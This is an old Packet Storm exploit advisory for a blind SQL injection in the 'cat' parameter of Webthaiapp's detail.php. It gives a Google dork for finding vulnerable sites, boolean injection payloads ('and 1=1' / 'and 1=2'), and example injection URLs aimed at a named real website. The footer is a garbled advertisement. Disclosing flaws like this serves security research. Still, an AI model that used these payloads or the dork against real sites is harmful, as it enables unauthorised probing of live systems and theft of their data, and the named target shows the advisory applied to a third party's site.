Webthaiapp Blind SQL Injection

2010-04-30T00:00:00
ID PACKETSTORM:89090
Type packetstorm
Reporter Xelenonz
Modified 2010-04-30T00:00:00

Description

                                        
                                            `  
--==+==================================================+==--  
  
--==+ Webthaiapp detail.php(cat) Blind Sql injection   
Vulnerability +==--  
  
--==+==================================================+==--  
  
Date : 30-04-2010  
  
-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
AUTHOR: Xelenonz  
  
Homepage : www.thaishadow.com  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=  
  
Application : Webthaiapp  
  
Vendor : http://www.Webthaiapp.com/  
  
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
DORK (google): "inurl:catalog/product/detail.php?cat="  
  
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
DESCRIPTION:  
  
EXPLOITS:  
  
  
  
detail.php?cat=[valid catid]+and+1=1 << TRUE  
  
  
  
detail.php?cat=[valid catid]+and+1=2 << False  
  
  
  
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
  
  
Example  
  
  
  
http://www.lamthai.com/catalog/product/detail.php?cat=44+and+1=1   
<< True  
  
  
  
http://www.lamthai.com/catalog/product/detail.php?cat=44+and+1=2   
<< False  
  
  
  
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
  
  
Special Thx : Krit admin@thaishadow,Thaishadow.com  
  
  
  
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
  
_________________________________________________________________  
Hotmail: ÍÕàÁÅ·Õèàª×èͶ×Íä´é«Öè§ÁÒ¾ÃéÍÁ¡Ñº¡Òûéͧ¡Ñ¹ÍÕàÁÅ¢ÂзÕèÁÕ»ÃÐÊÔ·¸ÔÀÒ¾  
https://signup.live.com/signup.aspx?id=60969  
`